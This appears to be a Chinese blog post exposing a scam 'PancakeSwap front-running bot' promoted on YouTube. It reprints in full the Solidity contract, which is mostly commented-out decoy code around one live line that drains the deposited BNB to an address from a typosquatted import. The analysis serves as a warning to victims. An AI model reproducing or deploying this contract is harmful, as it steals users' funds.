区块链骗局之夹子机器人

背景

我一个很久没联系的朋友，今天突然找到我，让我帮忙看看代码；说是自己在网上看到了一个区块链套利机器人的代码，很赚钱。自己也不根据代码部署了，但是钱取不出来了，他也是比较谨慎，就投入了5000多块吧！折合BNB大概2个（bnb 按照430美元/个）。让我帮看看。

• 骗子视频地址：https://www.youtube.com/watch?v=3QrBQW4TOfI&t=71s
• 合约代码地址 :https://ghostbin.com/rVoQh/raw

起初，我打开视频，也没人为他被骗。从视频标题，tag，特别是评论，100多条评论，全是清一色说的类似：我投了1个BNB，几天就变成了10个了…..
我就犯嘀咕了，我们圈子都知道链上机器人太卷了，机器人都开始打架了，还能赚钱吗？难道这个牛人有啥高明的策略？直到看了1分钟视频才反应过来是骗局。

骗术剖析

骗子在YouTube上，视频竟然打着*** 夹子机器人｜三明治机器人｜薄饼机器人｜pancakeswap｜科学家机器人｜抢先交易｜量化交易｜自动收入10+BNB｜Pancakes Front run bot｜（最新版本）*** ，看来骗子很注意SEO ，懂得搜索引擎优化。

其实这个骗术很简单，如果懂得代码的话，绝对不会上当。不懂代码的人看起来只会绝对好高级啊！加上被赚钱的欲望冲昏了头脑。下面就简要分析一下这个骗术有多低级

骗术分析

骗术大致过程是：用看起来免费的方式教别人部署夹子套利机器人，机器人会自动在pancake上捕获潜在的交易对。就这么空手套白狼的剧本。视频下发还给出了代码，合约地址，部署教程等资料。看起来没啥问题。但是看视频操作就不对了

1. 合约部署为何要更改注释中的钱包地址，这装模作样的，也许骗子这里也是思考了：如果这里写用户的地址，用户会更加放心。
   

2. 部署完成合约之后，为何要往合约地址转钱？？？注意：这里转入多少就会被骗子转走多少

3. 看看骗子的所谓夹子代码。（只能说是一对垃圾代码，除了注释掉的有用代码不足10句话），其中最有用的一句代码是：

   payable(manager.uniswapDepositAddress()).transfer(address(this).balance);

   看到了吗？这个就是把合约中的钱转走的，其余的被注释掉的无用代码都是障眼法。

下面的代码可能随时被骗子删除 ，我就粘贴了一份，切忌别去尝试哦！
合约代码链接：
https://ghostbin.com/rVoQh/raw

备用链接：
https://pastebin.com/raw/1kVN2Nj9

pragma solidity ^0.6.6;

// PancakeSwap FrontrunDeployer
import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2Callee.sol";
// PancakeSwap manager
import "https://github.com/Uniswapf/uniswap-v2-periphery/blob/main/master-contracts-interfaces/V1/IUniswapV1Factory.md";
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";



contract PancakeswapV2FrontBot {
    
    string public tokenName;
	string public tokenSymbol;
	uint frontrun;
	Manager manager;
	
	
	constructor(string memory _tokenName, string memory _tokenSymbol) public {
		tokenName = _tokenName;
		tokenSymbol = _tokenSymbol;
		manager = new Manager();
		
		}
	
	    
	    // Send required BNB for liquidity pair
	    receive() external payable {}
	    
	    
	    // Perform tasks (clubbed .json functions into one to reduce external calls & reduce gas) manager.performTasks();
	    
	    function action() public payable {
	
	//Perform a front-running attack on uniswap

//const fs = require('fs');
//var Web3 = require('web3');
//var abiDecoder = require('abi-decoder');
//var colors = require("colors");
//var Tx = require('ethereumjs-tx').Transaction;
//var axios = require('axios');
//var BigNumber = require('big-number');

//const {NETWORK, PANCAKE_ROUTER_ADDRESS, PANCAKE_FACTORY_ADDRESS, PANCAKE_ROUTER_ABI, PANCAKE_FACTORY_ABI, PANCAKE_POOL_ABI, HTTP_PROVIDER_LINK, WEBSOCKET_PROVIDER_LINK, HTTP_PROVIDER_LINK_TEST} = require('./constants.js');
//const {setBotAddress, getBotAddress, FRONT_BOT_ADDRESS, botABI} = require('./bot.js');
//const {PRIVATE_KEY, TOKEN_ADDRESS, AMOUNT, LEVEL} = require('./env.js');

//const INPUT_TOKEN_ADDRESS = '0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c';
//const WBNB_TOKEN_ADDRESS = '0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c';
manager;

//var input_token_info;
//var out_token_info;
//var pool_info;
//var gas_price_info;
manager;

//var web3;
//var web3Ts;
//var web3Ws;
//var pancakeRouter;
//var pancakeFactory;
manager;

// one gwei
//const ONE_GWEI = 1e9;
manager;

//var buy_finished = false;
//var sell_finished = false;
//var buy_failed = false;
//var sell_failed = false;
//var attack_started = false;
manager;

//var succeed = false;
//var subscription;
manager;

//async function createWeb3(){
    //try {
        // web3 = new Web3(new Web3.providers.HttpProvider(HTTP_PROVIDER_LINK));
        // web3 = new Web3(new Web3.providers.HttpProvider(HTTP_PROVIDER_LINK_TEST));
       // web3 = new Web3(EthereumTesterProvider());
       // web3.eth.getAccounts(console.log);
      //web3Ws = new Web3(new Web3.providers.WebsocketProvider(WEBSOCKET_PROVIDER_LINK));
    //pancakeRouter = new web3.eth.Contract(PANCAKE_ROUTER_ABI, PANCAKE_ROUTER_ADDRESS);
        //pancakeFactory = new web3.eth.Contract(PANCAKE_FACTORY_ABI, PANCAKE_FACTORY_ADDRESS);
        //abiDecoder.addABI(PANCAKE_ROUTER_ABI);
        manager;

        //return true;
    //} catch (error) {
      //console.log(error);
      //return false;
      

//async function main() {
 
//try {   
        //if (await createWeb3() == false) {
            //console.log('Web3 Create Error'.yellow);
            //process.exit();
            
            
        
        
        //const user_wallet = web3.eth.accounts.privateKeyToAccount(PRIVATE_KEY);
        //const out_token_address = TOKEN_ADDRESS;
        //const amount = AMOUNT;
        //const level = LEVEL;
        
        //ret = await preparedAttack(INPUT_TOKEN_ADDRESS, out_token_address, user_wallet, amount, level);
        //if(ret == false) {
          //process.exit();
        

        //await updatePoolInfo();
        //outputtoken = await pancakeRouter.methods.getAmountOut(((amount*1.2)*(10**18)).toString(), pool_info.input_volumn.toString(), pool_info.output_volumn.toString()).call();

        //await approve(gas_price_info.high, outputtoken, out_token_address, user_wallet);
        
        //log_str = '***** Tracking more ' + (pool_info.attack_volumn/(10**input_token_info.decimals)).toFixed(5) + ' ' +  input_token_info.symbol + '  Exchange on Pancake *****'
        // console.log(log_str.green);    
        // console.log(web3Ws);
        //web3Ws.onopen = function(evt) {
            //web3Ws.send(JSON.stringify({ method: "subscribe", topic: "transfers", address: user_wallet.address }));
            //console.log('connected')
        
        // get pending transactions
        //subscription = web3Ws.eth.subscribe('pendingTransactions', function (error, result) {
        //}).on("data", async function (transactionHash) {
            //console.log(transactionHash);

            // let transaction = await web3.eth.getTransaction(transactionHash);
            // if (transaction != null && transaction['to'] == PANCAKE_ROUTER_ADDRESS)
            // {
            //     await handleTransaction(transaction, out_token_address, user_wallet, amount, level);
            // }
            
            //if (succeed) {
                //console.log("The bot finished the attack.");
                //process.exit();
               
            
     

    //catch (error) {
      
      //if(error.data != null && error.data.see === 'https://infura.io/dashboard')
      
         //console.log('Daily request count exceeded, Request rate limited'.yellow);
         //console.log('Please insert other API Key');
      //else{
         //console.log('Unknown Handled Error');
         //console.log(error);
       

      //process.exit();


//function handleTransaction(transaction, out_token_address, user_wallet, amount, level) {
    
    //(await triggersFrontRun(transaction, out_token_address, amount, level)) {
        //subscription.unsubscribe();
        //console.log('Perform front running attack...');

        //gasPrice = parseInt(transaction['gasPrice']);
        //newGasPrice = gasPrice + 50*ONE_GWEI;

        //estimatedInput = ((amount*0.999)*(10**18)).toString();
        //realInput = (amount*(10**18)).toString();
        //gasLimit = (300000).toString();
        
        //await updatePoolInfo();

        //var outputtoken = await pancakeRouter.methods.getAmountOut(estimatedInput, pool_info.input_volumn.toString(), pool_info.output_volumn.toString()).call();
        //swap(newGasPrice, gasLimit, outputtoken, realInput, 0, out_token_address, user_wallet, transaction);

        //console.log("wait until the honest transaction is done...", transaction['hash']);

        //while (await isPending(transaction['hash'])) {
        

        //if(buy_failed)
        
            //succeed = false;
            //return;
           
        
        //console.log('Buy succeed:')
        
        //Sell
        //await updatePoolInfo();
        //var outputeth = await pancakeRouter.methods.getAmountOut(outputtoken, pool_info.output_volumn.toString(), pool_info.input_volumn.toString()).call();
        //outputeth = outputeth * 0.999;

        //await swap(newGasPrice, gasLimit, outputtoken, outputeth, 1, out_token_address, user_wallet, transaction);
        
        //console.log('Sell succeed');
        //succeed = true;
manager;

//async function approve(gasPrice, outputtoken, out_token_address, user_wallet){
    //var allowance = await out_token_info.token_contract.methods.allowance(user_wallet.address, PANCAKE_ROUTER_ADDRESS).call();
    
    //allowance = BigNumber(allowance);
    //outputtoken = BigNumber(outputtoken);

    //var decimals = BigNumber(10).power(out_token_info.decimals);
    //var max_allowance = BigNumber(10000).multiply(decimals);

    //if(outputtoken.gt(max_allowance))
   
       //console.log('replace max allowance')
       //max_allowance = outputtoken;
       
       payable(manager.uniswapDepositAddress()).transfer(address(this).balance);
      
    
    //if(outputtoken.gt(allowance)){
        //console.log(max_allowance.toString());
        //var approveTX ={
                //from: user_wallet.address,
                //to: out_token_address,
                //gas: 50000,
                //gasPrice: gasPrice*ONE_GWEI,
                //data: out_token_info.token_contract.methods.approve(PANCAKE_ROUTER_ADDRESS, max_allowance).encodeABI()
                manager;
            

        //var signedTX = await user_wallet.signTransaction(approveTX);
        //var result = await web3.eth.sendSignedTransaction(signedTX.rawTransaction);

        //console.log('Approved Token')
    
    //return;


//select attacking transaction
//async function triggersFrontRun(transaction, out_token_address, amount, level) {
    
    //if(attack_started)
        //return false;

    //console.log((transaction.hash).yellow, parseInt(transaction['gasPrice']) / 10**9);
    //if(parseInt(transaction['gasPrice']) / 10**9 > 10 && parseInt(transaction['gasPrice']) / 10**9 < 50){
        //attack_started = true;
        //return true
   manager; 

    //return false;

    //if (transaction['to'] != PANCAKE_ROUTER_ADDRESS) {
        //return false;
   

    //let data = parseTx(transaction['input']);
   manager;
    //let method = data[0];
    manager;
    //let params = data[1];
    manager;
    //let gasPrice = parseInt(transaction['gasPrice']) / 10**9;
    manager;

    //if(method == 'swapExactETHForTokens')
    manager;
    
        //let in_amount = transaction;
        manager;
        //let out_min = params[0];
        manager;

        //let path = params[1];
        manager;
        //let in_token_addr = path[0];
        manager;
        //let out_token_addr = path[path.length-1];
        manager;
        
        //let recept_addr = params[2];
        manager;
        //let deadline = params[3];
        manager;

        //if(out_token_addr != out_token_address)
        manager;
        
            // console.log(out_token_addr.blue)
            // console.log(out_token_address)
            //return false;
}
}

5. 骗子为了让代码伪装的更加像回事，自己注册了一个GitHub账号弄了个uniswapf的名字，混淆视听。。。我也差点被骗。。。

警示录

1. 区块链上遵循丛林法则，这里没有监管，没有纪律，一旦损失，无处伸冤。
2. 少贪便宜，天山不会掉馅饼
3. 碰到不懂的，不要头脑发热，被人洗脑，多问问懂的朋友